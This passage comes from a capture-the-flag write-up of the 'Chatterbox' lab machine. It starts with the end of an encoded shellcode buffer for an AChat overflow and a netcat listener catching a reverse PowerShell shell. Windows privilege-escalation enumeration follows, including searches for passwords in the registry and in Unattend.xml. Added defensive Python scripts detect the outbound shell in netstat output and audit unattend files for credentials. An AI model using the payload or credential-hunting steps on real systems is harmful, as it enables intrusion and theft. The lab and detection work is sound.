buf += b"\x71\x34\x6e\x44\x6b\x74\x6f\x6b\x6f\x6b\x53\x31"
buf += b"\x4f\x69\x70\x5a\x70\x51\x69\x6f\x57\x70\x31\x4f"
buf += b"\x4f\x6f\x71\x4a\x74\x4b\x6e\x32\x5a\x4b\x72\x6d"
buf += b"\x6f\x6d\x42\x4a\x4d\x31\x42\x6d\x45\x35\x64\x72"
buf += b"\x4b\x50\x4d\x30\x6d\x30\x52\x30\x62\x48\x4e\x51"
buf += b"\x74\x4b\x30\x6f\x74\x47\x49\x6f\x36\x75\x67\x4b"
buf += b"\x6a\x50\x45\x65\x74\x62\x50\x56\x70\x68\x35\x56"
buf += b"\x34\x55\x45\x6d\x33\x6d\x4b\x4f\x38\x55\x4f\x4c"
buf += b"\x5a\x66\x33\x4c\x59\x7a\x45\x30\x39\x6b\x59\x50"
buf += b"\x32\x55\x6d\x35\x55\x6b\x30\x47\x4b\x63\x61\x62"
buf += b"\x72\x4f\x72\x4a\x39\x70\x52\x33\x6b\x4f\x79\x45"
buf += b"\x54\x30\x50\x6f\x34\x37\x30\x65\x63\x42\x70\x73"
buf += b"\x50\x68\x70\x65\x32\x4c\x62\x4c\x4d\x50\x6c\x6d"
buf += b"\x52\x43\x4f\x30\x43\x39\x53\x35\x63\x48\x6c\x68"
buf += b"\x70\x6e\x32\x45\x71\x67\x4c\x6d\x50\x6f\x33\x32"
buf += b"\x51\x5a\x50\x65\x50\x63\x61\x64\x4d\x50\x72\x4e"
buf += b"\x71\x55\x54\x34\x4c\x6e\x50\x77\x51\x55\x73\x32"
buf += b"\x62\x43\x62\x4c\x62\x49\x4f\x75\x52\x4e\x64\x34"
buf += b"\x6e\x49\x4e\x4e\x72\x44\x42\x4f\x62\x57\x32\x4e"
buf += b"\x72\x4c\x72\x4f\x70\x61\x62\x44\x70\x73\x44\x34"
buf += b"\x74\x32\x52\x49\x32\x4e\x43\x37\x6c\x68\x6c\x67"
buf += b"\x70\x68\x54\x34\x74\x34\x62\x50\x4f\x4a\x4c\x6f"
buf += b"\x6c\x6f\x6c\x71\x6c\x70\x4e\x4e\x30\x31\x6e\x50"
buf += b"\x6e\x4e\x4e\x51\x6d\x66\x4e\x4e\x50\x36\x6c\x6f"
buf += b"\x6f\x59\x42\x4e\x73\x46\x50\x6f\x50\x6b\x50\x65"
buf += b"\x6e\x4d\x32\x30\x50\x6f\x52\x57\x70\x65\x74\x32"
buf += b"\x70\x53\x61\x58\x50\x65\x62\x4c\x30\x6c\x61\x44"
buf += b"\x32\x43\x42\x50\x6c\x6e\x70\x70\x51\x63\x70\x31"
buf += b"\x4b\x77\x6d\x59\x59\x70\x41\x41"
```
Start a Python web server to host the script, then run rbo.py again and catch the callback:
```
└─# rlwrap nc -nvlp 443
listening on [any] 443 ...
connect to [10.10.16.6] from (UNKNOWN) [10.10.10.74] 49160
Windows PowerShell running as user Alfred on CHATTERBOX
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\Windows\system32>whoami
chatterbox\alfred
```
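Seen from the host, the shell just obtained leaves a distinctive trace: the AChat process, which should only ever accept clients on 9255/9256, now holds a TCP connection it opened itself to 10.10.16.6:443. The script below is an added example (not part of the original writeup) that finds this pattern in netstat -ano output; the listing embedded in it is constructed to mirror this box, and it needs nothing beyond the Python standard library.

```python
"""Flag a listening service that has dialled out on its own.

Added example, not from the original Chatterbox writeup. It parses
`netstat -ano` text and reports every PID that owns a LISTENING socket
and also has an ESTABLISHED connection whose local port is NOT one of
its listening ports: an accepted client would reuse the listening port,
so anything else is a connection the process initiated.
"""
import re
from collections import defaultdict

# Constructed sample in netstat -ano layout, modelled on the box. The
# PID 4 session on port 445 is a legitimate accepted SMB client and is
# included to show that it is not flagged.
SAMPLE_NETSTAT = """\
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       664
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    10.10.10.74:139        0.0.0.0:0              LISTENING       4
  TCP    10.10.10.74:9255       0.0.0.0:0              LISTENING       28692
  TCP    10.10.10.74:9256       0.0.0.0:0              LISTENING       28692
  TCP    10.10.10.74:445        10.10.16.6:51234       ESTABLISHED     4
  TCP    10.10.10.74:49158      10.10.16.6:443         ESTABLISHED     28692
  TCP    [::]:135               [::]:0                 LISTENING       664
  UDP    0.0.0.0:123            *:*                                    832
  UDP    10.10.10.74:137        *:*                                    4
"""

# One socket line: proto, local, foreign, optional state (UDP has none), PID.
LINE_RE = re.compile(
    r"^\s*(?P<proto>TCP|UDP)\s+(?P<local>\S+)\s+(?P<remote>\S+)"
    r"(?:\s+(?P<state>[A-Z_]+))?\s+(?P<pid>\d+)\s*$"
)


def parse_netstat(text):
    """Return one dict per socket line; header and blank lines are skipped."""
    rows = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            row = m.groupdict()
            row["pid"] = int(row["pid"])
            rows.append(row)
    return rows


def port_of(endpoint):
    """Port of 'host:port' (IPv6 '[::]:135' included); None for '*:*'."""
    port = endpoint.rpartition(":")[2]
    return int(port) if port.isdigit() else None


def outbound_from_listeners(rows):
    """Map PID -> (sorted listening ports, sorted peers it connected to).

    Only processes that listen somewhere are considered; for each of them
    an ESTABLISHED socket on a non-listening local port is reported.
    """
    listening = defaultdict(set)
    established = defaultdict(list)
    for row in rows:
        if row["proto"] != "TCP":
            continue
        lport = port_of(row["local"])
        if row["state"] == "LISTENING":
            listening[row["pid"]].add(lport)
        elif row["state"] == "ESTABLISHED":
            established[row["pid"]].append((lport, row["remote"]))

    findings = {}
    for pid, conns in established.items():
        if pid not in listening:
            continue
        dialled = sorted(peer for lport, peer in conns if lport not in listening[pid])
        if dialled:
            findings[pid] = (sorted(listening[pid]), dialled)
    return findings


if __name__ == "__main__":
    hits = outbound_from_listeners(parse_netstat(SAMPLE_NETSTAT))
    for pid, (ports, peers) in hits.items():
        print("PID %d listens on %s but connected out to %s" % (pid, ports, peers))
```

On the sample this reports only PID 28692 (the AChat process) with its outbound connection to 10.10.16.6:443, while the accepted SMB session owned by PID 4 stays quiet.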
Privilege Escalation
Enumeration
User group
```
C:\Users\Alfred>whoami /all
whoami /all

USER INFORMATION
----------------

User Name         SID
================= =============================================
chatterbox\alfred S-1-5-21-1218242403-4263168573-589647361-1000


GROUP INFORMATION
-----------------

Group Name                             Type             SID          Attributes
====================================== ================ ============ ==================================================
Everyone                               Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                          Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\INTERACTIVE               Well-known group S-1-5-4      Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                          Well-known group S-1-2-1      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users       Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization         Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account             Well-known group S-1-5-113    Mandatory group, Enabled by default, Enabled group
LOCAL                                  Well-known group S-1-2-0      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication       Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label            S-1-16-8192  Mandatory group, Enabled by default, Enabled group


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                          State
============================= ==================================== ========
SeShutdownPrivilege           Shut down the system                 Disabled
SeChangeNotifyPrivilege       Bypass traverse checking             Enabled
SeUndockPrivilege             Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set       Disabled
SeTimeZonePrivilege           Change the time zone                 Disabled
```
Local users
```
C:\Users\Alfred>net user
net user

User accounts for \\CHATTERBOX

-------------------------------------------------------------------------------
Administrator            Alfred                   Guest
The command completed successfully.


C:\Users\Alfred>net user Alfred
net user Alfred
User name                    Alfred
Full Name
Comment
User's comment
Country code                 001 (United States)
Account active               Yes
Account expires              Never

Password last set            12/10/2017 9:18:08 AM
Password expires             Never
Password changeable          12/10/2017 9:18:08 AM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   1/10/2025 3:47:12 AM

Logon hours allowed          All

Local Group Memberships      *Users
Global Group memberships     *None
The command completed successfully.
```
Systeminfo
```
C:\Users\Alfred>systeminfo
systeminfo

Host Name:                 CHATTERBOX
OS Name:                   Microsoft Windows 7 Professional
OS Version:                6.1.7601 Service Pack 1 Build 7601
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Workstation
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:
Product ID:                00371-222-9819843-86663
Original Install Date:     12/10/2017, 9:18:19 AM
System Boot Time:          1/10/2025, 3:47:03 AM
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               X86-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: x64 Family 25 Model 1 Stepping 1 AuthenticAMD ~2445 Mhz
BIOS Version:              Phoenix Technologies LTD 6.00, 11/12/2020
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             en-us;English (United States)
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC-05:00) Eastern Time (US & Canada)
Total Physical Memory:     2,047 MB
Available Physical Memory: 1,451 MB
Virtual Memory: Max Size:  4,095 MB
Virtual Memory: Available: 3,537 MB
Virtual Memory: In Use:    558 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    WORKGROUP
Logon Server:              \\CHATTERBOX
Hotfix(s):                 183 Hotfix(s) Installed.
                           [01]: KB2849697
                           [02]: KB2849696
                           [03]: KB2841134
                           [04]: KB2670838
                           [05]: KB2830477
                           [06]: KB2592687
                           [07]: KB2479943
                           [08]: KB2491683
                           [09]: KB2506212
                           [10]: KB2506928
                           [11]: KB2509553
                           [12]: KB2533552
                           [13]: KB2534111
                           [14]: KB2545698
                           [15]: KB2547666
                           [16]: KB2552343
                           [17]: KB2560656
                           [18]: KB2563227
                           [19]: KB2564958
                           [20]: KB2574819
                           [21]: KB2579686
                           [22]: KB2604115
                           [23]: KB2620704
                           [24]: KB2621440
                           [25]: KB2631813
                           [26]: KB2639308
                           [27]: KB2640148
                           [28]: KB2647753
                           [29]: KB2654428
                           [30]: KB2660075
                           [31]: KB2667402
                           [32]: KB2676562
                           [33]: KB2685811
                           [34]: KB2685813
                           [35]: KB2690533
                           [36]: KB2698365
                           [37]: KB2705219
                           [38]: KB2719857
                           [39]: KB2726535
                           [40]: KB2727528
                           [41]: KB2729094
                           [42]: KB2732059
                           [43]: KB2732487
                           [44]: KB2736422
                           [45]: KB2742599
                           [46]: KB2750841
                           [47]: KB2761217
                           [48]: KB2763523
                           [49]: KB2770660
                           [50]: KB2773072
                           [51]: KB2786081
                           [52]: KB2799926
                           [53]: KB2800095
                           [54]: KB2807986
                           [55]: KB2808679
                           [56]: KB2813430
                           [57]: KB2820331
                           [58]: KB2834140
                           [59]: KB2840631
                           [60]: KB2843630
                           [61]: KB2847927
                           [62]: KB2852386
                           [63]: KB2853952
                           [64]: KB2857650
                           [65]: KB2861698
                           [66]: KB2862152
                           [67]: KB2862330
                           [68]: KB2862335
                           [69]: KB2864202
                           [70]: KB2868038
                           [71]: KB2871997
                           [72]: KB2884256
                           [73]: KB2891804
                           [74]: KB2892074
                           [75]: KB2893294
                           [76]: KB2893519
                           [77]: KB2894844
                           [78]: KB2900986
                           [79]: KB2908783
                           [80]: KB2911501
                           [81]: KB2912390
                           [82]: KB2918077
                           [83]: KB2919469
                           [84]: KB2923545
                           [85]: KB2931356
                           [86]: KB2937610
                           [87]: KB2943357
                           [88]: KB2952664
                           [89]: KB2966583
                           [90]: KB2968294
                           [91]: KB2970228
                           [92]: KB2972100
                           [93]: KB2973112
                           [94]: KB2973201
                           [95]: KB2973351
                           [96]: KB2977292
                           [97]: KB2978742
                           [98]: KB2984972
                           [99]: KB2985461
                           [100]: KB2991963
                           [101]: KB2992611
                           [102]: KB3003743
                           [103]: KB3004361
                           [104]: KB3004375
                           [105]: KB3006121
                           [106]: KB3006137
                           [107]: KB3010788
                           [108]: KB3011780
                           [109]: KB3013531
                           [110]: KB3020370
                           [111]: KB3020388
                           [112]: KB3021674
                           [113]: KB3021917
                           [114]: KB3022777
                           [115]: KB3023215
                           [116]: KB3030377
                           [117]: KB3035126
                           [118]: KB3037574
                           [119]: KB3042058
                           [120]: KB3045685
                           [121]: KB3046017
                           [122]: KB3046269
                           [123]: KB3054476
                           [124]: KB3055642
                           [125]: KB3059317
                           [126]: KB3060716
                           [127]: KB3061518
                           [128]: KB3067903
                           [129]: KB3068708
                           [130]: KB3071756
                           [131]: KB3072305
                           [132]: KB3074543
                           [133]: KB3075226
                           [134]: KB3078601
                           [135]: KB3078667
                           [136]: KB3080149
                           [137]: KB3084135
                           [138]: KB3086255
                           [139]: KB3092627
                           [140]: KB3093513
                           [141]: KB3097989
                           [142]: KB3101722
                           [143]: KB3102429
                           [144]: KB3107998
                           [145]: KB3108371
                           [146]: KB3108381
                           [147]: KB3108664
                           [148]: KB3109103
                           [149]: KB3109560
                           [150]: KB3110329
                           [151]: KB3118401
                           [152]: KB3122648
                           [153]: KB3123479
                           [154]: KB3126587
                           [155]: KB3127220
                           [156]: KB3133977
                           [157]: KB3137061
                           [158]: KB3138378
                           [159]: KB3138612
                           [160]: KB3138910
                           [161]: KB3139398
                           [162]: KB3139914
                           [163]: KB3140245
                           [164]: KB3147071
                           [165]: KB3150220
                           [166]: KB3150513
                           [167]: KB3156016
                           [168]: KB3156019
                           [169]: KB3159398
                           [170]: KB3161102
                           [171]: KB3161949
                           [172]: KB3161958
                           [173]: KB3172605
                           [174]: KB3177467
                           [175]: KB3179573
                           [176]: KB3184143
                           [177]: KB3185319
                           [178]: KB4014596
                           [179]: KB4019990
                           [180]: KB4040980
                           [181]: KB976902
                           [182]: KB982018
                           [183]: KB4054518
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) PRO/1000 MT Network Connection
                                 Connection Name: Local Area Connection 4
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 10.10.10.74
```
Listening ports and established ports
```
C:\Users\Alfred>netstat -ano
netstat -ano

Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       664
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:49152          0.0.0.0:0              LISTENING       364
  TCP    0.0.0.0:49153          0.0.0.0:0              LISTENING       716
  TCP    0.0.0.0:49154          0.0.0.0:0              LISTENING       856
  TCP    0.0.0.0:49155          0.0.0.0:0              LISTENING       460
  TCP    0.0.0.0:49156          0.0.0.0:0              LISTENING       532
  TCP    0.0.0.0:49157          0.0.0.0:0              LISTENING       468
  TCP    10.10.10.74:139        0.0.0.0:0              LISTENING       4
  TCP    10.10.10.74:9255       0.0.0.0:0              LISTENING       28692
  TCP    10.10.10.74:9256       0.0.0.0:0              LISTENING       28692
  TCP    10.10.10.74:49158      10.10.16.6:443         ESTABLISHED     28692
  TCP    [::]:135               [::]:0                 LISTENING       664
  TCP    [::]:445               [::]:0                 LISTENING       4
  TCP    [::]:49152             [::]:0                 LISTENING       364
  TCP    [::]:49153             [::]:0                 LISTENING       716
  TCP    [::]:49154             [::]:0                 LISTENING       856
  TCP    [::]:49155             [::]:0                 LISTENING       460
  TCP    [::]:49156             [::]:0                 LISTENING       532
  TCP    [::]:49157             [::]:0                 LISTENING       468
  UDP    0.0.0.0:123            *:*                                    832
  UDP    0.0.0.0:500            *:*                                    856
  UDP    0.0.0.0:4500           *:*                                    856
  UDP    0.0.0.0:5355           *:*                                    1116
  UDP    0.0.0.0:51748          *:*                                    1116
  UDP    0.0.0.0:57481          *:*                                    1116
  UDP    10.10.10.74:137        *:*                                    4
  UDP    10.10.10.74:138        *:*                                    4
  UDP    10.10.10.74:1900       *:*                                    3124
  UDP    10.10.10.74:9256       *:*                                    28692
  UDP    10.10.10.74:51818      *:*                                    3124
  UDP    127.0.0.1:1900         *:*                                    3124
  UDP    127.0.0.1:51819        *:*                                    3124
  UDP    [::]:123               *:*                                    832
  UDP    [::]:500               *:*                                    856
  UDP    [::]:4500              *:*                                    856
  UDP    [::1]:1900             *:*                                    3124
  UDP    [::1]:51817            *:*                                    3124
```
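A defender reading this listing would correlate listening ports with the PID that also holds an outbound connection: PID 28692 owns 9255/9256 (the AChat service) and also holds the ESTABLISHED connection back to 10.10.16.6:443, which is the reverse shell produced by the overflow. The Python script below is an added example, not part of the original writeup; it parses an excerpt of the `netstat -ano` output above and flags any process that both listens on a port and has a connection to a non-local peer.

```python
import ipaddress
from collections import defaultdict
from dataclasses import dataclass, field

# Excerpt of the `netstat -ano` listing shown above (copied from the writeup,
# not constructed), so the triage below runs offline.
NETSTAT_OUTPUT = """
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       664
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    10.10.10.74:139        0.0.0.0:0              LISTENING       4
  TCP    10.10.10.74:9255       0.0.0.0:0              LISTENING       28692
  TCP    10.10.10.74:9256       0.0.0.0:0              LISTENING       28692
  TCP    10.10.10.74:49158      10.10.16.6:443         ESTABLISHED     28692
  TCP    [::]:135               [::]:0                 LISTENING       664
  UDP    0.0.0.0:123            *:*                                    832
  UDP    10.10.10.74:9256       *:*                                    28692
"""


@dataclass
class ProcessSockets:
    listening: set = field(default_factory=set)    # {(proto, local_port)}
    established: set = field(default_factory=set)  # {(local_port, peer_host, peer_port)}


def split_endpoint(endpoint):
    """Split 'host:port' at the last colon so '[::]:135' and '*:*' work too."""
    host, _, port = endpoint.rpartition(":")
    return host, port


def is_local_host(host):
    """Wildcards and loopback addresses are not remote peers."""
    host = host.strip("[]")
    if host in ("*", "0.0.0.0", "::"):
        return True
    try:
        return ipaddress.ip_address(host).is_loopback
    except ValueError:
        return False


def parse_netstat(text):
    """Group netstat -ano rows by PID: what each process listens on and whom it talks to."""
    procs = defaultdict(ProcessSockets)
    for line in text.splitlines():
        parts = line.split()
        if not parts or parts[0] not in ("TCP", "UDP"):
            continue  # header, blank or prompt line
        proto = parts[0]
        _, local_port = split_endpoint(parts[1])
        peer_host, peer_port = split_endpoint(parts[2])
        if proto == "TCP":
            state, pid = parts[3], int(parts[4])
        else:
            state, pid = "", int(parts[3])  # UDP rows have no State column
        if proto == "UDP" or state == "LISTENING":
            procs[pid].listening.add((proto, int(local_port)))
        elif state == "ESTABLISHED":
            procs[pid].established.add((int(local_port), peer_host, int(peer_port)))
    return procs


def listeners_with_remote_peers(procs):
    """Flag processes that serve a listening port and also hold an established
    connection to a non-local peer. On this box that is PID 28692: the AChat
    process owning 9255/9256 plus the connection back to 10.10.16.6:443."""
    findings = []
    for pid, sockets in sorted(procs.items()):
        peers = sorted({(h, p) for _, h, p in sockets.established if not is_local_host(h)})
        if sockets.listening and peers:
            findings.append((pid, sorted(sockets.listening), peers))
    return findings


if __name__ == "__main__":
    for pid, listening, peers in listeners_with_remote_peers(parse_netstat(NETSTAT_OUTPUT)):
        print(f"PID {pid}: listens on {listening}, connected out to {peers}")
```

The rule is deliberately narrow: a service process normally accepts connections, it does not open them, so a listener that also dials out to an address on port 443 is the first thing to map back to the process list (tasklist or Get-Process by PID).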
SMB shares
```
C:\Users\Alfred>net share
net share

Share name   Resource                        Remark

-------------------------------------------------------------------------------
C$           C:\                             Default share
IPC$                                         Remote IPC
ADMIN$       C:\Windows                      Remote Admin
The command completed successfully.
```
Windows exploit suggester
Let’s use wesng (Windows Exploit Suggester - Next Generation), which compares the hotfix list from systeminfo against its vulnerability database. First, update its definitions:
```
└─# ./wes.py --update
Windows Exploit Suggester 1.05 ( https://github.com/bitsadmin/wesng/ )
[+] Updating definitions
[+] Obtained definitions created at 20250110
```
The Windows Exploit Suggester output was very long; we can come back to it later if we need it.
Unattend.xml
```
C:\Users\Alfred>type C:\Windows\Panther\Unattend.xml
type C:\Windows\Panther\Unattend.xml
<?xml version='1.0' encoding='utf-8'?>
<unattend xmlns="urn:schemas-microsoft-com:unattend" xmlns:wcm="http://schemas.microsoft.com/WMIConfig/2002/State">
  <settings pass="windowsPE" wasPassProcessed="true">
    <component name="Microsoft-Windows-Setup" publicKeyToken="31bf3856ad364e35" language="neutral" versionScope="nonSxS" processorArchitecture="x86">
      <UserData>
        <AcceptEula>true</AcceptEula>
        <!-- The following section only needed for Vista installs -->
      </UserData>
      <DiskConfiguration>
        <WillShowUI>OnError</WillShowUI>
        <Disk>
          <DiskID>0</DiskID>
          <WillWipeDisk>true</WillWipeDisk>
          <CreatePartitions>
            <CreatePartition>
              <Order>1</Order>
              <Type>Primary</Type>
              <Extend>true</Extend>
            </CreatePartition>
          </CreatePartitions>
        </Disk>
      </DiskConfiguration>
      <ComplianceCheck>
        <DisplayReport>OnError</DisplayReport>
      </ComplianceCheck>
      <ImageInstall>
        <OSImage>
          <InstallFrom>
            <MetaData wcm:action="add">
              <Key>/IMAGE/NAME</Key>
              <Value>Windows 7 PROFESSIONAL</Value>
            </MetaData>
          </InstallFrom>
          <InstallTo>
            <DiskID>0</DiskID>
            <PartitionID>1</PartitionID>
          </InstallTo>
          <WillShowUI>OnError</WillShowUI>
          <InstallToAvailablePartition>false</InstallToAvailablePartition>
        </OSImage>
      </ImageInstall>
    </component>
    <component name="Microsoft-Windows-International-Core-WinPE" publicKeyToken="31bf3856ad364e35" language="neutral" versionScope="nonSxS" processorArchitecture="x86">
      <InputLocale>en-US</InputLocale>
      <SystemLocale>en-US</SystemLocale>
      <UILanguage>en-US</UILanguage>
      <UserLocale>en-US</UserLocale>
    </component>
  </settings>
  <settings pass="oobeSystem" wasPassProcessed="true">
    <component name="Microsoft-Windows-Shell-Setup" publicKeyToken="31bf3856ad364e35" language="neutral" versionScope="nonSxS" processorArchitecture="x86">
      <AutoLogon>
        <Password>*SENSITIVE*DATA*DELETED*</Password>
        <Enabled>true</Enabled>
        <Username>Alfred</Username>
      </AutoLogon>
      <UserAccounts>
        <LocalAccounts>
          <LocalAccount wcm:action="add">
            <Password>*SENSITIVE*DATA*DELETED*</Password>
            <Group>administrators;users</Group>
            <Name>Alfred</Name>
          </LocalAccount>
        </LocalAccounts>
      </UserAccounts>
      <OOBE>
        <HideEULAPage>true</HideEULAPage>
        <ProtectYourPC>3</ProtectYourPC>
        <SkipMachineOOBE>true</SkipMachineOOBE>
        <SkipUserOOBE>true</SkipUserOOBE>
        <NetworkLocation>Other</NetworkLocation>
      </OOBE>
      <FirstLogonCommands>
        <SynchronousCommand wcm:action="add">
          <CommandLine>cmd /c copy a:\upgrader.exe %TEMP%\upgrader.exe</CommandLine>
          <Order>1</Order>
        </SynchronousCommand>
        <SynchronousCommand wcm:action="add">
          <CommandLine>cmd /c copy a:\unattend.cmd %TEMP%\unattend.cmd</CommandLine>
          <Order>2</Order>
        </SynchronousCommand>
        <SynchronousCommand wcm:action="add">
          <CommandLine>cmd /c copy a:\storePwd.exe %TEMP%\storePwd.exe</CommandLine>
          <Order>3</Order>
        </SynchronousCommand>
        <SynchronousCommand wcm:action="add">
          <CommandLine>cmd /c copy a:\storePwd.ini %TEMP%\storePwd.ini</CommandLine>
          <Order>4</Order>
        </SynchronousCommand>
        <SynchronousCommand wcm:action="add">
          <CommandLine>%TEMP%\unattend.cmd</CommandLine>
          <Order>5</Order>
        </SynchronousCommand>
        <SynchronousCommand wcm:action="add">
          <CommandLine>powercfg -setactive 8c5e7fda-e8bf-4a96-9a85-a6e23a8c635c</CommandLine>
          <Order>6</Order>
        </SynchronousCommand>
        <SynchronousCommand wcm:action="add">
          <CommandLine>net accounts /MAXPWAGE:UNLIMITED</CommandLine>
          <Order>7</Order>
        </SynchronousCommand>
        <SynchronousCommand wcm:action="add">
          <CommandLine>reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AutoAdminLogon /t REG_SZ /d 0 /f</CommandLine>
          <Order>8</Order>
        </SynchronousCommand>
      </FirstLogonCommands>
      <TimeZone>Eastern Standard Time</TimeZone>
    </component>
  </settings>
  <settings pass="specialize" wasPassProcessed="true">
    <component name="Microsoft-Windows-Security-Licensing-SLC-UX" publicKeyToken="31bf3856ad364e35" language="neutral" versionScope="nonSxS" processorArchitecture="x86">
      <SkipAutoActivation>true</SkipAutoActivation>
    </component>
    <component name="Microsoft-Windows-Deployment" publicKeyToken="31bf3856ad364e35" language="neutral" versionScope="nonSxS" processorArchitecture="x86">
      <RunSynchronous>
        <RunSynchronousCommand wcm:action="add">
          <Order>1</Order>
          <Path>reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\CurrentVersion\NetworkList\Signatures\FirstNetwork" /v Category /t REG_DWORD /d 00000000 /f</Path>
        </RunSynchronousCommand>
      </RunSynchronous>
    </component>
  </settings>
</unattend>
```
No passwords in Unattend.xml: both Password fields have been redacted to *SENSITIVE*DATA*DELETED*.
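Checking an unattend file by eye is error-prone, because the credential can sit in either of two shapes. As an added example that is not code from the writeup, the Python script below audits an unattend.xml for leftover credentials: it handles the flat `<Password>text</Password>` form seen above, recognises the `*SENSITIVE*DATA*DELETED*` marker Windows Setup leaves after redaction, and goes beyond the file above by also decoding the `PlainText=false` form, in which Windows stores the base64 of the UTF-16LE password with the element name appended. The sample document is constructed: it mirrors Alfred's two redacted entries and adds an `AdministratorPassword` element carrying a made-up password.

```python
import base64
import xml.etree.ElementTree as ET

NS = {"u": "urn:schemas-microsoft-com:unattend"}
REDACTED = "*SENSITIVE*DATA*DELETED*"          # marker left by Windows Setup after redaction
CREDENTIAL_TAGS = ("Password", "AdministratorPassword")


def encode_unattend_password(password, element_name):
    """PlainText=false storage: password + element name, UTF-16LE, base64."""
    return base64.b64encode((password + element_name).encode("utf-16-le")).decode("ascii")


def decode_unattend_password(value, element_name):
    """Reverse of the above; strips the element-name suffix Windows appends."""
    raw = base64.b64decode(value).decode("utf-16-le")
    return raw[: -len(element_name)] if raw.endswith(element_name) else raw


def local_name(tag):
    """'{urn:...}Password' -> 'Password' (ElementTree keeps the namespace in the tag)."""
    return tag.rsplit("}", 1)[-1]


def _walk(elem, parent, path, out):
    """Depth-first walk that records every credential element with its parent and path."""
    name = local_name(elem.tag)
    path = path + [name]
    if name in CREDENTIAL_TAGS:
        out.append((path, elem, parent))
        return
    for child in elem:
        _walk(child, elem, path, out)


def _classify(elem, parent):
    value_el = elem.find("u:Value", NS)
    if value_el is not None:                     # nested <Value>/<PlainText> form
        text = (value_el.text or "").strip()
        plain = elem.findtext("u:PlainText", default="true", namespaces=NS).strip().lower() != "false"
    else:                                        # flat form, as in the file above
        text = (elem.text or "").strip()
        plain = True
    account = None
    if parent is not None:                       # AutoLogon uses Username, LocalAccount uses Name
        account = parent.findtext("u:Username", namespaces=NS) or parent.findtext("u:Name", namespaces=NS)
    if not text:
        return "empty", None, account
    if text == REDACTED:
        return "redacted", None, account
    if plain:
        return "plaintext", text, account
    return "encoded", decode_unattend_password(text, local_name(elem.tag)), account


def audit_unattend(xml_text):
    """One record per credential-bearing element, in document order."""
    found = []
    _walk(ET.fromstring(xml_text), None, [], found)
    records = []
    for path, elem, parent in found:
        status, secret, account = _classify(elem, parent)
        records.append({"path": "/".join(path), "status": status, "secret": secret, "account": account})
    return records


# Constructed sample (not the file from the box): Alfred's two redacted entries
# plus an AdministratorPassword in the base64 form with a made-up password.
SAMPLE_ENCODED = encode_unattend_password("Example-Pass-1", "AdministratorPassword")
SAMPLE_UNATTEND = f"""<unattend xmlns="urn:schemas-microsoft-com:unattend" xmlns:wcm="http://schemas.microsoft.com/WMIConfig/2002/State">
  <settings pass="oobeSystem">
    <component name="Microsoft-Windows-Shell-Setup">
      <AutoLogon>
        <Password>{REDACTED}</Password>
        <Enabled>true</Enabled>
        <Username>Alfred</Username>
      </AutoLogon>
      <UserAccounts>
        <AdministratorPassword>
          <Value>{SAMPLE_ENCODED}</Value>
          <PlainText>false</PlainText>
        </AdministratorPassword>
        <LocalAccounts>
          <LocalAccount wcm:action="add">
            <Password>{REDACTED}</Password>
            <Group>administrators;users</Group>
            <Name>Alfred</Name>
          </LocalAccount>
        </LocalAccounts>
      </UserAccounts>
    </component>
  </settings>
</unattend>
"""

if __name__ == "__main__":
    for record in audit_unattend(SAMPLE_UNATTEND):
        print(record)
```

Run against the real file with `audit_unattend(open(path, encoding="utf-8").read())`; anything reported as `plaintext` or `encoded` is a credential that survived deployment and should be removed from the image, not merely from the machine.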
Registry keys
```
PS C:\Windows\system32> reg query HKLM /f password /t REG_SZ /s

HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6BC0989B-0CE6-11D1-BAAE-00C04FC2E20D}\ProgID
    (Default)    REG_SZ    IAS.ChangePassword.1

HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6BC0989B-0CE6-11D1-BAAE-00C04FC2E20D}\VersionIndependentProgID
    (Default)    REG_SZ    IAS.ChangePassword

HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6f45dc1e-5384-457a-bc13-2cd81b0d28ed}
    (Default)    REG_SZ    PasswordProvider

HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7A9D77BD-5403-11d2-8785-2E0420524153}
    InfoTip    REG_SZ    Manages users and passwords for this computer

HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7be73787-ce71-4b33-b4c8-00d32b54bea8}
    (Default)    REG_SZ    HomeGroup Password

